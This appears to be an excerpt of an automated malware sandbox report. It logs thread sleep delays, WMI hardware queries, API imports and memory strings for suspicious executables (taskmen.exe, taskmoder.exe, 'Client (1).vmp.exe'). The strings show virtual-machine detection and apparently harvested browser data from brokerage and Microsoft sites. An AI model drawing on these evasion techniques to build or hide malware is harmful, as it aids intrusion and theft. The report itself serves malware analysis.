                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -581327s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -581125s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -580732s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -580582s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -580437s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -580299s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -580078s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -579905s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -579765s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -579637s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -579520s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -579397s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -579281s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -579171s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -579022s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -578905s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -578787s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -578656s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -578500s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -578187s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -578052s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -577934s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -577825s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -577715s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -577609s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -577498s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -577328s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -577172s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -577043s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -576934s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -576826s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -576718s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -576548s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -576422s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -576306s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -576203s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -576059s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -575932s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -575547s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -575370s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -575252s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe TID: 6460Thread sleep time: -11068046444225724s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe TID: 4088Thread sleep count: 94 > 30
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe TID: 1276Thread sleep count: 5580 > 30
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe TID: 408Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -19369081277395017s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -600000s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -599875s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -599764s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -599656s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -599545s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -599436s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -599326s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -599219s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -599109s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -599000s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -598890s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -598780s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -598671s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -598558s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -598436s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -598326s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Client (1).vmp.exe TID: 5636Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exe TID: 1452Thread sleep count: 7576 > 30
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exe TID: 1452Thread sleep time: -7576000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exe TID: 4308Thread sleep count: 525 > 30
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exe TID: 4308Thread sleep time: -15750000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exe TID: 3680Thread sleep time: -7384000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exe TID: 6472Thread sleep time: -16320000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\Temp\ydztkyrb.exeLast function: Thread delayed
                        Source: C:\Windows\Temp\swtpd1aw.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC040BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,34_2_00007FF6FDC040BC
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC1B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,34_2_00007FF6FDC1B190
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC2FCA0 FindFirstFileExA,34_2_00007FF6FDC2FCA0
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC216A4 VirtualQuery,GetSystemInfo,34_2_00007FF6FDC216A4
                        Source: C:\Users\user\Desktop\Winscreen.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\upx.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeThread delayed: delay time: 30000
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeThread delayed: delay time: 30000
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeThread delayed: delay time: 40000
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 600000
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 599859
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 599728
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 599562
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 599140
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 599014
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 598875
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 598725
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 598606
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 598483
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 598366
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 598232
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 598109
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 597987
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 597871
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 597757
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 597630
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 597505
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 597359
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 597231
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 597060
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 596547
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 596386
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 596262
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 596134
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 596007
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 595874
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 595756
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 595618
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 595453
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 595309
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 595147
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 595027
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 594906
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 594776
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 594656
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 594508
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 594297
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 593890
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 593719
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 593531
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 593357
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 593187
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 592937
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 592640
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 592447
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 592250
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 592031
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 591765
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 591281
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 591062
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 590890
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 590672
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 590484
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 590297
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 590125
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 589984
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 589843
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 589672
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 589469
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 589281
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 589000
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 588651
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 588359
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 588186
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 587984
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 587870
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 587709
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 587515
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 587281
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 587062
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 586859
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 586700
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 586047
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 585750
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 585594
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 585468
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 585340
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 585149
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 585027
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 584911
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 100000
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 584719
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 584580
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 584451
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 584281
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 584141
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 584015
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 583890
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 583609
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 583062
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 582911
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 582780
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 582647
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 582527
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 582404
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 582250
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 582078
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 581890
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 581757
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 581615
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 581469
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 581327
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 581125
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 580732
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 580582
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 580437
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 580299
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 580078
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 579905
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 579765
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 579637
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 579520
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 579397
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 579281
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 579171
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 579022
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 578905
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 578787
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 578656
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 578500
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 578187
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 578052
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 577934
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 577825
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 577715
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 577609
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 577498
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 577328
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 577172
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 577043
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 576934
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 576826
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 576718
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 576548
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 576422
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 576306
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 576203
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 576059
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 575932
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 575547
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 575370
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 575252
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599875
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599764
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599656
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599545
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599436
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599326
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599219
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599109
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599000
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598890
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598780
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598671
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598558
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598436
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598326
                        Source: C:\Users\user\AppData\Roaming\Client (1).vmp.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeThread delayed: delay time: 30000
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeThread delayed: delay time: 30000
                        Source: Client (1).vmp.exe, 0000002F.00000002.2661664628.0000000000AD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllwwd"P
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: global block list test formVMware20,11696428655
                        Source: taskmoder.exe.0.drBinary or memory string: VMWARE
                        Source: tmpAADE.tmp.dat.43.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                        Source: wscript.exe, 00000038.00000003.2850138607.0000000002BC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: taskmen.exe, 00000020.00000002.4582393087.000000000310D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxService
                        Source: taskmoder.exe, 0000001F.00000002.3027507006.00000000029E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q9C:\Program Files\VMware\VMware Workstation\vmware-vmx.exe
